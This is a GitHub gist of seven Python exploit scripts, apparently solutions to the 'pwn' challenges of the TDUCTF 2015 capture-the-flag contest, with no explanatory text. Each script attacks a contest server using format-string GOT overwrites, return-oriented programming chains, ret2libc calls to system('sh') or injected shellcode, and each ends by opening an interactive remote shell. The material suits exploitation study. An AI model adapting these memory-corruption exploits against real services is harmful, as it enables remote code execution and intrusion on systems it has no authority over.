Last active
September 2, 2015 16:23
-
-
Save shift-crops/c89e1e538f4e47c1acd8 to your computer and use it in GitHub Desktop.
TDUCTF 2015 Pwn writeups
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from sc_pwn import * | |
| rhp = ("crackme.sakura.tductf.org",10773) | |
| #rhp = ("192.168.75.129",8080) | |
| addr_ret = 0x08048afc | |
| addr_got_exit = 0x0804912c | |
| addr_got_sleep = 0x0804911c | |
| addr_tmp = 0x080491a0 | |
| #========== | |
| def attack(nc): | |
| info('addr_got_exit = 0x%08x' % addr_got_exit) | |
| info('addr_got_sleep = 0x%08x' % addr_got_sleep) | |
| info('addr_tmp = 0x%08x' % addr_tmp) | |
| nc.read_until('You:') | |
| fsb = FSB(offset=0,size=2) | |
| fsb.set_adrval(addr_got_exit, addr_tmp) | |
| fsb.set_adrval(addr_got_sleep, addr_ret) | |
| exploit = fsb.auto_write(index=6) | |
| proc('Sending Exploit...') | |
| nc.sendln(exploit) | |
| nc.read_until('You:') | |
| shellcode = ShellCode('x86').sh() | |
| proc('Sending Shellcode...') | |
| nc.sendln(shellcode) | |
| nc.read_all() | |
| #========== | |
| if __name__=='__main__': | |
| nc = Communicate(rhp) | |
| attack(nc) | |
| sh = Shell(nc) | |
| sh.select() | |
| del(sh) | |
| del(nc) | |
| #========== |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from sc_pwn import * | |
| rhp = ("crackme.sakura.tductf.org",10195) | |
| #rhp = ("192.168.75.129",8080) | |
| addr_pop_x3 = 0x080485d9 | |
| addr_plt_mprotect = 0x08048390 | |
| addr_plt_read = 0x080483a0 | |
| addr_buf = 0x08048000 | |
| #========== | |
| def attack(nc): | |
| info('addr_plt_mprotect = 0x%08x' % addr_plt_mprotect) | |
| info('addr_plt_read = 0x%08x' % addr_plt_read) | |
| shellcode = ShellCode('x86').sh() | |
| nc.read_until(':') | |
| exploit = 'a'*0x10 | |
| exploit += pack_32(addr_plt_mprotect) | |
| exploit += pack_32(addr_pop_x3) | |
| exploit += pack_32(addr_buf) | |
| exploit += pack_32(0x1000) | |
| exploit += pack_32(PROT_READ|PROT_WRITE|PROT_EXEC) | |
| exploit += pack_32(addr_plt_read) | |
| exploit += pack_32(addr_buf) | |
| exploit += pack_32(0) | |
| exploit += pack_32(addr_buf) | |
| exploit += pack_32(len(shellcode)) | |
| proc('Sending Exploit...') | |
| nc.send(exploit) | |
| proc('Sending Shellcode...') | |
| nc.send(shellcode) | |
| #========== | |
| if __name__=='__main__': | |
| nc = Communicate(rhp) | |
| attack(nc) | |
| sh = Shell(nc) | |
| sh.select() | |
| del(sh) | |
| del(nc) | |
| #========== |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from sc_pwn import * | |
| from time import sleep | |
| rhp = ("crackme.sakura.tductf.org",47806) | |
| #rhp = ("192.168.75.129",8080) | |
| addr_buf = 0x08049aa0 | |
| #========== | |
| def attack(nc): | |
| nc.read_until('you:') | |
| sc = ShellCode('x86') | |
| shellcode = pack_32(addr_buf+4) | |
| shellcode += sc.sh() | |
| proc('Sending Shellcode...') | |
| nc.sendln(shellcode) | |
| nc.read_until('message:') | |
| exploit = 'a'*0x26 | |
| exploit += pack_32(addr_buf+4) | |
| proc('Sending Exploit...') | |
| nc.sendln(exploit) | |
| sleep(10) | |
| nc.read_all() | |
| #========== | |
| if __name__=='__main__': | |
| nc = Communicate(rhp) | |
| attack(nc) | |
| sh = Shell(nc) | |
| sh.select() | |
| del(sh) | |
| del(nc) | |
| #========== |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from sc_pwn import * | |
| rhp = ("crackme.sakura.tductf.org",10170) | |
| #rhp = ("192.168.75.129",8080) | |
| addr_plt_system = 0x08048410 | |
| addr_plt_exit = 0x08048430 | |
| addr_str_sh = 0x080486ad | |
| #========== | |
| def attack(nc): | |
| info('addr_plt_system = 0x%08x' % addr_plt_system) | |
| info('addr_plt_exit = 0x%08x' % addr_plt_exit) | |
| info('addr_str_sh = 0x%08x' % addr_str_sh) | |
| nc.read_until(':') | |
| exploit = 'a'*0x10 | |
| exploit += pack_32(addr_plt_system) | |
| exploit += pack_32(addr_plt_exit) | |
| exploit += pack_32(addr_str_sh) | |
| proc('Sending Exploit...') | |
| nc.sendln(exploit) | |
| #========== | |
| if __name__=='__main__': | |
| nc = Communicate(rhp) | |
| attack(nc) | |
| sh = Shell(nc) | |
| sh.select() | |
| del(sh) | |
| del(nc) | |
| #========== |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from sc_pwn import * | |
| rhp = ("crackme.sakura.tductf.org",10170) | |
| #rhp = ("192.168.75.129",8080) | |
| addr_plt_puts = 0x080483d0 | |
| addr_str_0xb = 0x08048647 | |
| addr_pop_ebx = 0x08048381 | |
| addr_pop_ecx = 0x08048530 | |
| addr_pop_edx = 0x0804852e | |
| addr_str_sh = 0x0804864a | |
| addr_int_80 = 0x08048532 | |
| #========== | |
| def attack(nc): | |
| nc.read_until(':') | |
| exploit = 'a'*0x10 | |
| exploit += pack_32(addr_plt_puts) | |
| exploit += pack_32(addr_pop_ebx) | |
| exploit += pack_32(addr_str_0xb) | |
| exploit += pack_32(addr_pop_ebx) | |
| exploit += pack_32(addr_str_sh) | |
| exploit += pack_32(addr_pop_ecx) | |
| exploit += pack_32(0) | |
| exploit += pack_32(addr_pop_edx) | |
| exploit += pack_32(0) | |
| exploit += pack_32(addr_int_80) | |
| proc('Sending Exploit...') | |
| nc.sendln(exploit) | |
| nc.read_all() | |
| #========== | |
| if __name__=='__main__': | |
| nc = Communicate(rhp) | |
| attack(nc) | |
| sh = Shell(nc) | |
| sh.select() | |
| del(sh) | |
| del(nc) | |
| #========== |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from sc_pwn import * | |
| from time import sleep | |
| rhp = ("crackme.sakura.tductf.org",20562) | |
| #rhp = ("192.168.75.129",8080) | |
| addr_plt_read = [0x08048580, 0x08048510] #[old,new] | |
| addr_plt_puts = [0x080485e0, 0x08048560] | |
| #========== | |
| def attack(nc): | |
| nc.read_until('here: ') | |
| addr_pieces = int(nc.read(10),16) | |
| info('addr_pieces = 0x%08x' % addr_pieces) | |
| nc.read_until('chain: \n') | |
| shellcode = ShellCode('x86').sh() | |
| exploit = pack_32(addr_plt_read[check_ver()]+6) | |
| exploit += pack_32(addr_pieces) | |
| exploit += pack_32(STDIN) | |
| exploit += pack_32(addr_pieces) | |
| exploit += pack_32(len(shellcode)) | |
| proc('Sending Exploit...') | |
| nc.sendln(exploit) | |
| sleep(0.1) | |
| proc('Sending Shellcode...') | |
| nc.send(shellcode) | |
| def check_ver(): | |
| nc = Communicate(rhp) | |
| nc.read_until('board: ') | |
| addr_board = int(nc.read(10),16) | |
| nc.read_until('chain: \n') | |
| exploit = pack_32(addr_plt_puts[0]+6) | |
| exploit += pack_32(addr_plt_puts[1]+6) | |
| exploit += pack_32(addr_board+0x10) | |
| exploit += pack_32(addr_board+0x14) | |
| exploit += pack_32(4) | |
| exploit += 'A\x00' | |
| nc.sendln(exploit) | |
| """ | |
| old: new: | |
| addr_puts addr_memset | |
| addr_dynamic_link addr_puts | |
| addr_board+0x10 -> "\x04\x00" addr_board+0x10 | |
| addr_board+0x14 -> "A\x00" | |
| 4 | |
| """ | |
| new = nc.read(1) == 'A' | |
| info('Version : '+('new' if new else 'old')) | |
| del(nc) | |
| return new | |
| #========== | |
| if __name__=='__main__': | |
| nc = Communicate(rhp) | |
| attack(nc) | |
| sh = Shell(nc) | |
| sh.select() | |
| del(sh) | |
| del(nc) | |
| #========== |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from sc_pwn import * | |
| rhp = ("crackme.sakura.tductf.org",10150) | |
| #rhp = ("192.168.75.129",8080) | |
| #========== | |
| def attack(nc): | |
| nc.read_until(':') | |
| sc = ShellCode('x86',0x100) | |
| shellcode = sc.sh() | |
| shellcode += sc.padding() | |
| proc('Sending Shellcode...') | |
| nc.sendln(shellcode) | |
| #========== | |
| if __name__=='__main__': | |
| nc = Communicate(rhp) | |
| attack(nc) | |
| sh = Shell(nc) | |
| sh.select() | |
| del(sh) | |
| del(nc) | |
| #========== |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment